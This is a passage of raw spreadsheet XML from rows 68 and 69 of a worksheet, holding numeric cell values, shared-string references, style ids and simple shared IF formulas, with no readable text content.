        <v>0.0</v>
      </c>
      <c r="EO68" s="109">
        <v>0.0</v>
      </c>
      <c r="EP68" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ68" s="109">
        <v>0.0</v>
      </c>
      <c r="ER68" s="110">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="ES68" s="110">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="ET68" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU68" s="110">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="EV68" s="110">
        <f t="shared" si="134"/>
        <v>0</v>
      </c>
      <c r="EW68" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX68" s="110">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="EY68" s="110">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="EZ68" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA68" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB68" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC68" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FD68" s="111">
        <v>2.0</v>
      </c>
      <c r="FE68" s="111">
        <v>2.0</v>
      </c>
      <c r="FF68" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG68" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH68" s="111">
        <v>0.0</v>
      </c>
      <c r="FI68" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ68" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK68" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL68" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM68" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN68" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO68" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP68" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ68" s="111">
        <v>0.0</v>
      </c>
      <c r="FR68" s="111">
        <v>0.0</v>
      </c>
      <c r="FS68" s="112">
        <v>2.0</v>
      </c>
      <c r="FT68" s="112">
        <v>1.0</v>
      </c>
      <c r="FU68" s="112">
        <v>1.0</v>
      </c>
      <c r="FV68" s="112">
        <v>0.0</v>
      </c>
      <c r="FW68" s="112">
        <v>2.0</v>
      </c>
      <c r="FX68" s="112">
        <v>2.0</v>
      </c>
      <c r="FY68" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ68" s="112">
        <v>0.0</v>
      </c>
      <c r="GA68" s="112">
        <v>0.0</v>
      </c>
      <c r="GB68" s="112">
        <v>0.0</v>
      </c>
      <c r="GC68" s="112">
        <v>0.0</v>
      </c>
      <c r="GD68" s="112">
        <v>0.0</v>
      </c>
      <c r="GE68" s="112">
        <v>0.0</v>
      </c>
      <c r="GF68" s="112">
        <v>0.0</v>
      </c>
      <c r="GG68" s="112">
        <v>0.0</v>
      </c>
      <c r="GH68" s="113">
        <f t="shared" si="139"/>
        <v>1</v>
      </c>
      <c r="GI68" s="113">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="GJ68" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK68" s="113">
        <f t="shared" si="142"/>
        <v>1</v>
      </c>
      <c r="GL68" s="113">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="GM68" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN68" s="113">
        <f t="shared" si="145"/>
        <v>2</v>
      </c>
      <c r="GO68" s="113">
        <f t="shared" si="146"/>
        <v>0</v>
      </c>
      <c r="GP68" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ68" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR68" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS68" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT68" s="94"/>
      <c r="GU68" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV68" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW68" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX68" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY68" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ68" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA68" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB68" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC68" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD68" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE68" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF68" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG68" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH68" s="116">
        <v>15921.0</v>
      </c>
      <c r="HI68" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ68" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK68" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL68" s="93">
        <v>1.0</v>
      </c>
      <c r="HM68" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN68" s="93">
        <v>0.0</v>
      </c>
      <c r="HO68" s="93">
        <v>1.0</v>
      </c>
      <c r="HP68" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ68" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR68" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS68" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT68" s="139" t="s">
        <v>1318</v>
      </c>
      <c r="HU68" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV68" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW68" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX68" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY68" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ68" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA68" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB68" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC68" s="120" t="str">
        <f t="shared" si="148"/>
        <v>-</v>
      </c>
      <c r="ID68" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE68" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF68" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG68" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH68" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II68" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ68" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK68" s="99">
        <v>1.0</v>
      </c>
      <c r="IL68" s="99">
        <v>0.0</v>
      </c>
      <c r="IM68" s="121">
        <f t="shared" si="97"/>
        <v>1</v>
      </c>
      <c r="IN68" s="122" t="s">
        <v>444</v>
      </c>
      <c r="IO68" s="98">
        <v>1.0</v>
      </c>
      <c r="IP68" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ68" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR68" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS68" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT68" s="127"/>
      <c r="IU68" s="127"/>
      <c r="IV68" s="127"/>
      <c r="IW68" s="127"/>
      <c r="IX68" s="127"/>
      <c r="IY68" s="127"/>
      <c r="IZ68" s="127"/>
      <c r="JA68" s="127"/>
      <c r="JB68" s="127"/>
      <c r="JC68" s="127"/>
      <c r="JD68" s="127"/>
      <c r="JE68" s="127"/>
      <c r="JF68" s="127"/>
      <c r="JG68" s="127"/>
      <c r="JH68" s="127"/>
      <c r="JI68" s="127"/>
      <c r="JJ68" s="127"/>
      <c r="JK68" s="127"/>
      <c r="JL68" s="127"/>
      <c r="JM68" s="127"/>
      <c r="JN68" s="127"/>
      <c r="JO68" s="127"/>
      <c r="JP68" s="127"/>
      <c r="JQ68" s="127"/>
      <c r="JR68" s="127"/>
      <c r="JS68" s="127"/>
      <c r="JT68" s="127"/>
      <c r="JU68" s="127"/>
      <c r="JV68" s="127"/>
      <c r="JW68" s="127"/>
      <c r="JX68" s="127"/>
      <c r="JY68" s="127"/>
      <c r="JZ68" s="127"/>
      <c r="KA68" s="127"/>
      <c r="KB68" s="127"/>
      <c r="KC68" s="127"/>
      <c r="KD68" s="127"/>
      <c r="KE68" s="127"/>
      <c r="KF68" s="127"/>
      <c r="KG68" s="127"/>
      <c r="KH68" s="127"/>
      <c r="KI68" s="127"/>
      <c r="KJ68" s="127"/>
      <c r="KK68" s="127"/>
      <c r="KL68" s="127"/>
      <c r="KM68" s="127"/>
      <c r="KN68" s="127"/>
      <c r="KO68" s="127"/>
      <c r="KP68" s="127"/>
      <c r="KQ68" s="127"/>
      <c r="KR68" s="127"/>
      <c r="KS68" s="127"/>
      <c r="KT68" s="127"/>
      <c r="KU68" s="127"/>
      <c r="KV68" s="127"/>
      <c r="KW68" s="127"/>
      <c r="KX68" s="127"/>
      <c r="KY68" s="127"/>
      <c r="KZ68" s="127"/>
      <c r="LA68" s="127"/>
      <c r="LB68" s="127"/>
      <c r="LC68" s="127"/>
      <c r="LD68" s="127"/>
      <c r="LE68" s="127"/>
      <c r="LF68" s="127"/>
      <c r="LG68" s="127"/>
      <c r="LH68" s="127"/>
      <c r="LI68" s="127"/>
      <c r="LJ68" s="127"/>
      <c r="LK68" s="127"/>
      <c r="LL68" s="127"/>
      <c r="LM68" s="127"/>
      <c r="LN68" s="127"/>
      <c r="LO68" s="127"/>
      <c r="LP68" s="127"/>
      <c r="LQ68" s="127"/>
      <c r="LR68" s="127"/>
      <c r="LS68" s="127"/>
      <c r="LT68" s="127"/>
      <c r="LU68" s="127"/>
      <c r="LV68" s="127"/>
      <c r="LW68" s="127"/>
      <c r="LX68" s="127"/>
      <c r="LY68" s="127"/>
      <c r="LZ68" s="127"/>
      <c r="MA68" s="127"/>
      <c r="MB68" s="127"/>
      <c r="MC68" s="127"/>
      <c r="MD68" s="127"/>
      <c r="ME68" s="127"/>
      <c r="MF68" s="127"/>
      <c r="MG68" s="127"/>
      <c r="MH68" s="127"/>
      <c r="MI68" s="127"/>
      <c r="MJ68" s="127"/>
      <c r="MK68" s="127"/>
      <c r="ML68" s="127"/>
      <c r="MM68" s="127"/>
      <c r="MN68" s="127"/>
      <c r="MO68" s="127"/>
      <c r="MP68" s="127"/>
      <c r="MQ68" s="127"/>
      <c r="MR68" s="127"/>
      <c r="MS68" s="127"/>
      <c r="MT68" s="127"/>
      <c r="MU68" s="127"/>
      <c r="MV68" s="127"/>
      <c r="MW68" s="127"/>
      <c r="MX68" s="127"/>
      <c r="MY68" s="127"/>
      <c r="MZ68" s="127"/>
      <c r="NA68" s="127"/>
      <c r="NB68" s="127"/>
      <c r="NC68" s="127"/>
      <c r="ND68" s="127"/>
      <c r="NE68" s="127"/>
      <c r="NF68" s="127"/>
      <c r="NG68" s="127"/>
      <c r="NH68" s="127"/>
      <c r="NI68" s="127"/>
      <c r="NJ68" s="127"/>
      <c r="NK68" s="127"/>
      <c r="NL68" s="127"/>
      <c r="NM68" s="127"/>
      <c r="NN68" s="127"/>
      <c r="NO68" s="127"/>
      <c r="NP68" s="127"/>
      <c r="NQ68" s="127"/>
      <c r="NR68" s="127"/>
      <c r="NS68" s="127"/>
      <c r="NT68" s="127"/>
      <c r="NU68" s="127"/>
      <c r="NV68" s="127"/>
      <c r="NW68" s="127"/>
      <c r="NX68" s="127"/>
      <c r="NY68" s="127"/>
    </row>
    <row r="69" ht="153.75" customHeight="1">
      <c r="B69" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C69" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D69" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E69" s="90" t="s">
        <v>1306</v>
      </c>
      <c r="F69" s="90" t="s">
        <v>1307</v>
      </c>
      <c r="G69" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H69" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I69" s="92" t="s">
        <v>1308</v>
      </c>
      <c r="J69" s="92" t="s">
        <v>1309</v>
      </c>
      <c r="K69" s="92" t="s">
        <v>1319</v>
      </c>
      <c r="L69" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M69" s="93">
        <v>145.0</v>
      </c>
      <c r="N69" s="93">
        <v>1.0</v>
      </c>
      <c r="O69" s="93">
        <v>0.0</v>
      </c>
      <c r="P69" s="93">
        <v>8.0</v>
      </c>
      <c r="Q69" s="93">
        <f t="shared" si="103"/>
        <v>8</v>
      </c>
      <c r="R69" s="93">
        <v>8.0</v>
      </c>
      <c r="S69" s="93">
        <v>0.0</v>
      </c>
      <c r="T69" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U69" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V69" s="155" t="s">
        <v>1320</v>
      </c>
      <c r="W69" s="96" t="s">
        <v>1313</v>
      </c>
      <c r="X69" s="126" t="s">
        <v>1314</v>
      </c>
      <c r="Y69" s="126" t="s">
        <v>1315</v>
      </c>
      <c r="Z69" s="132" t="s">
        <v>1316</v>
      </c>
      <c r="AA69" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB69" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC69" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD69" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE69" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF69" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG69" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH69" s="99" t="s">
        <v>1317</v>
      </c>
      <c r="AI69" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ69" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK69" s="100">
        <v>254.0</v>
      </c>
      <c r="AL69" s="100">
        <v>1.0</v>
      </c>
      <c r="AM69" s="100">
        <v>1.0</v>
      </c>
      <c r="AN69" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO69" s="100">
        <v>254.0</v>
      </c>
      <c r="AP69" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ69" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AR69" s="100">
        <v>254.0</v>
      </c>
      <c r="AS69" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT69" s="100">
        <f t="shared" ref="AT69:AT88" si="149">IF(AR69="-",AS69,AR69)</f>
        <v>254</v>
      </c>
      <c r="AU69" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV69" s="100">
        <v>254.0</v>
      </c>
      <c r="AW69" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX69" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY69" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ69" s="100">
        <v>0.0</v>
      </c>
      <c r="BA69" s="102">
        <v>147.0</v>
      </c>
      <c r="BB69" s="102">
        <v>1.0</v>
      </c>
      <c r="BC69" s="102">
        <v>1.0</v>
      </c>
      <c r="BD69" s="102">
        <v>1.0</v>
      </c>
      <c r="BE69" s="102">
        <v>0.0</v>
      </c>
      <c r="BF69" s="102">
        <v>0.0</v>
      </c>
      <c r="BG69" s="102">
        <v>0.0</v>
      </c>
      <c r="BH69" s="102">
        <v>0.0</v>
      </c>
      <c r="BI69" s="102">
        <v>1.0</v>
      </c>
      <c r="BJ69" s="102">
        <v>1.0</v>
      </c>
      <c r="BK69" s="102">
        <v>1.0</v>
      </c>
      <c r="BL69" s="103">
        <f t="shared" si="112"/>
        <v>1</v>
      </c>
      <c r="BM69" s="103">
        <f t="shared" si="113"/>
        <v>1</v>
      </c>
      <c r="BN69" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO69" s="103">
        <f t="shared" si="115"/>
        <v>0.125</v>
      </c>
      <c r="BP69" s="103">
        <f t="shared" si="116"/>
        <v>0.125</v>
      </c>
      <c r="BQ69" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR69" s="103">
        <f t="shared" si="118"/>
        <v>0.125</v>
      </c>
      <c r="BS69" s="103">
        <f t="shared" si="119"/>
        <v>0.125</v>
      </c>
      <c r="BT69" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU69" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV69" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW69" s="104">
        <v>254.0</v>
      </c>
      <c r="BX69" s="104">
        <v>1.0</v>
      </c>
      <c r="BY69" s="104">
        <v>1.0</v>
      </c>
      <c r="BZ69" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA69" s="104">
        <v>254.0</v>
      </c>
      <c r="CB69" s="104">
        <v>1.0</v>
      </c>
      <c r="CC69" s="104">
        <v>1.0</v>
      </c>
      <c r="CD69" s="104">
        <v>254.0</v>
      </c>
      <c r="CE69" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF69" s="104">
        <f t="shared" si="121"/>
        <v>254</v>
      </c>
      <c r="CG69" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH69" s="104">
        <v>254.0</v>
      </c>
      <c r="CI69" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ69" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK69" s="104">
        <v>0.0</v>
      </c>
      <c r="CL69" s="104">
        <v>0.0</v>
      </c>
      <c r="CM69" s="105">
        <v>145.0</v>
      </c>
      <c r="CN69" s="105">
        <v>1.0</v>
      </c>
      <c r="CO69" s="105">
        <v>1.0</v>
      </c>
      <c r="CP69" s="105">
        <v>1.0</v>
      </c>
      <c r="CQ69" s="105">
        <v>0.0</v>
      </c>
      <c r="CR69" s="105">
        <v>1.0</v>
      </c>
      <c r="CS69" s="105">
        <v>0.0</v>
      </c>
      <c r="CT69" s="105">
        <v>0.0</v>
      </c>
      <c r="CU69" s="105">
        <v>0.0</v>
      </c>
      <c r="CV69" s="105">
        <v>0.0</v>
      </c>
      <c r="CW69" s="105">
        <v>1.0</v>
      </c>
      <c r="CX69" s="105">
        <v>1.0</v>
      </c>
      <c r="CY69" s="105">
        <v>1.0</v>
      </c>
      <c r="CZ69" s="105">
        <v>0.0</v>
      </c>
      <c r="DA69" s="105">
        <v>1.0</v>
      </c>
      <c r="DB69" s="106">
        <f t="shared" si="122"/>
        <v>1</v>
      </c>
      <c r="DC69" s="106">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="DD69" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE69" s="106">
        <f t="shared" si="125"/>
        <v>0.125</v>
      </c>
      <c r="DF69" s="106">
        <f t="shared" si="126"/>
        <v>0.125</v>
      </c>
      <c r="DG69" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH69" s="106">
        <f t="shared" si="127"/>
        <v>0.125</v>
      </c>
      <c r="DI69" s="106">
        <f t="shared" si="128"/>
        <v>0.125</v>
      </c>
      <c r="DJ69" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK69" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL69" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM69" s="108" t="s">
        <v>1321</v>
      </c>
      <c r="DN69" s="108">
        <v>5.0</v>
      </c>
      <c r="DO69" s="108">
        <v>8.0</v>
      </c>
      <c r="DP69" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ69" s="108" t="s">
        <v>1321</v>
      </c>
      <c r="DR69" s="108">
        <v>5.0</v>
      </c>
      <c r="DS69" s="108">
        <v>8.0</v>
      </c>
      <c r="DT69" s="108" t="s">
        <v>1322</v>
      </c>
      <c r="DU69" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV69" s="108" t="str">
        <f t="shared" ref="DV69:DV76" si="150">IF(DT69="-",DU69,DT69)</f>
        <v>59597, 254</v>
      </c>
      <c r="DW69" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX69" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY69" s="108" t="s">
        <v>1323</v>
      </c>
      <c r="DZ69" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA69" s="108">
        <v>3.0</v>
      </c>
      <c r="EB69" s="108">
        <v>35.0</v>
      </c>
      <c r="EC69" s="109">
        <v>147.0</v>
      </c>
      <c r="ED69" s="109">
        <v>30.0</v>
      </c>
      <c r="EE69" s="109">
        <v>43.0</v>
      </c>
      <c r="EF69" s="109">
        <v>43.0</v>
      </c>
      <c r="EG69" s="109">
        <v>0.0</v>
      </c>
      <c r="EH69" s="109">
        <v>43.0</v>
      </c>
      <c r="EI69" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ69" s="109">
        <v>0.0</v>
      </c>
      <c r="EK69" s="109">
        <v>1.0</v>
      </c>
      <c r="EL69" s="109">
        <v>1.0</v>
      </c>
      <c r="EM69" s="109">
        <v>30.0</v>
      </c>
      <c r="EN69" s="109">
        <v>43.0</v>
      </c>
      <c r="EO69" s="109">
        <v>43.0</v>
      </c>
      <c r="EP69" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ69" s="109">
        <v>43.0</v>
      </c>
      <c r="ER69" s="110">
        <f t="shared" si="130"/>
        <v>30</v>
      </c>
      <c r="ES69" s="110">
        <f t="shared" si="131"/>
        <v>30</v>
      </c>
      <c r="ET69" s="110">
        <f t="shared" si="132"/>
        <v>1</v>
      </c>
      <c r="EU69" s="110">
        <f t="shared" si="133"/>
        <v>5.375</v>
      </c>
      <c r="EV69" s="110">
        <f t="shared" si="134"/>
        <v>5.375</v>
      </c>
      <c r="EW69" s="110">
        <f t="shared" si="135"/>
        <v>0.125</v>
      </c>
      <c r="EX69" s="110">
        <f t="shared" si="136"/>
        <v>5.375</v>
      </c>
      <c r="EY69" s="110">
        <f t="shared" si="137"/>
        <v>5.375</v>
      </c>
      <c r="EZ69" s="110">
        <f t="shared" si="138"/>
        <v>0.125</v>
      </c>
      <c r="FA69" s="110">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="FB69" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC69" s="111" t="s">
        <v>1324</v>
      </c>
      <c r="FD69" s="111">
        <v>7.0</v>
      </c>
      <c r="FE69" s="111">
        <v>71.0</v>
      </c>
      <c r="FF69" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG69" s="111" t="s">
        <v>1325</v>
      </c>
      <c r="FH69" s="111">
        <v>5.0</v>
      </c>
      <c r="FI69" s="111">
        <v>43.0</v>
      </c>
      <c r="FJ69" s="111" t="s">
        <v>1326</v>
      </c>
      <c r="FK69" s="111" t="s">
        <v>281</v>
      </c>
      <c r="FL69" s="111" t="str">
        <f t="shared" si="95"/>
        <v>59597, 254, 2002752, 2002749
</v>
      </c>
      <c r="FM69" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN69" s="111" t="s">
        <v>281</v>
      </c>
      <c r="FO69" s="111" t="s">
        <v>1327</v>
      </c>
      <c r="FP69" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ69" s="111">
        <v>3.0</v>
      </c>
      <c r="FR69" s="111">
        <v>36.0</v>
      </c>
      <c r="FS69" s="112">
        <v>145.0</v>
      </c>
      <c r="FT69" s="112">
        <v>52.0</v>
      </c>
      <c r="FU69" s="112">
        <v>70.0</v>
      </c>
      <c r="FV69" s="112">
        <v>43.0</v>
      </c>
      <c r="FW69" s="112">
        <v>28.0</v>
      </c>
      <c r="FX69" s="112">
        <v>71.0</v>
      </c>
      <c r="FY69" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ69" s="112">
        <v>0.0</v>
      </c>
      <c r="GA69" s="112">
        <v>8.0</v>
      </c>
      <c r="GB69" s="112">
        <v>8.0</v>
      </c>
      <c r="GC69" s="112">
        <v>30.0</v>
      </c>
      <c r="GD69" s="112">
        <v>43.0</v>
      </c>
      <c r="GE69" s="112">
        <v>43.0</v>
      </c>
      <c r="GF69" s="112">
        <v>0.0</v>
      </c>
      <c r="GG69" s="112">
        <v>43.0</v>
      </c>
      <c r="GH69" s="113">
        <f t="shared" si="139"/>
        <v>52</v>
      </c>
      <c r="GI69" s="113">
        <f t="shared" si="140"/>
        <v>30</v>
      </c>
      <c r="GJ69" s="113">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="GK69" s="113">
        <f t="shared" si="142"/>
        <v>8.75</v>
      </c>
      <c r="GL69" s="113">
        <f t="shared" si="143"/>
        <v>5.375</v>
      </c>
      <c r="GM69" s="113">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="GN69" s="113">
        <f t="shared" si="145"/>
        <v>8.875</v>
      </c>
      <c r="GO69" s="113">
        <f t="shared" si="146"/>
        <v>5.375</v>
      </c>
      <c r="GP69" s="113">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="GQ69" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR69" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS69" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT69" s="94"/>
      <c r="GU69" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV69" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW69" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX69" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY69" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ69" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA69" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB69" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC69" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD69" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE69" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF69" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG69" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH69" s="116">
        <v>15921.0</v>
      </c>
      <c r="HI69" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ69" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK69" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL69" s="93">
        <v>144.0</v>
      </c>
      <c r="HM69" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN69" s="93">
        <v>0.0</v>
      </c>
      <c r="HO69" s="93">
        <v>1.0</v>
      </c>
      <c r="HP69" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ69" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR69" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS69" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT69" s="139" t="s">
        <v>1328</v>
      </c>
      <c r="HU69" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV69" s="119" t="s">
        <v>1329</v>
      </c>
      <c r="HW69" s="119">
        <v>4.0</v>
      </c>
      <c r="HX69" s="119">
        <v>65.0</v>
      </c>
      <c r="HY69" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ69" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA69" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB69" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC69" s="120" t="s">
        <v>1330</v>
      </c>
      <c r="ID69" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE69" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF69" s="120" t="s">
        <v>1329</v>
      </c>
      <c r="IG69" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH69" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II69" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ69" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK69" s="99">
        <v>144.0</v>
      </c>
      <c r="IL69" s="99">
        <v>0.0</v>
      </c>
      <c r="IM69" s="121">
        <f t="shared" si="97"/>
        <v>1</v>
      </c>
      <c r="IN69" s="122" t="s">
        <v>444</v>
      </c>
      <c r="IO69" s="98">
        <v>1.0</v>
      </c>
      <c r="IP69" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ69" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR69" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS69" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT69" s="127"/>
      <c r="IU69" s="127"/>
      <c r="IV69" s="127"/>
      <c r="IW69" s="127"/>
      <c r="IX69" s="127"/>
      <c r="IY69" s="127"/>
      <c r="IZ69" s="127"/>
      <c r="JA69" s="127"/>
      <c r="JB69" s="127"/>
      <c r="JC69" s="127"/>
      <c r="JD69" s="127"/>
      <c r="JE69" s="127"/>
      <c r="JF69" s="127"/>
      <c r="JG69" s="127"/>
      <c r="JH69" s="127"/>
      <c r="JI69" s="127"/>
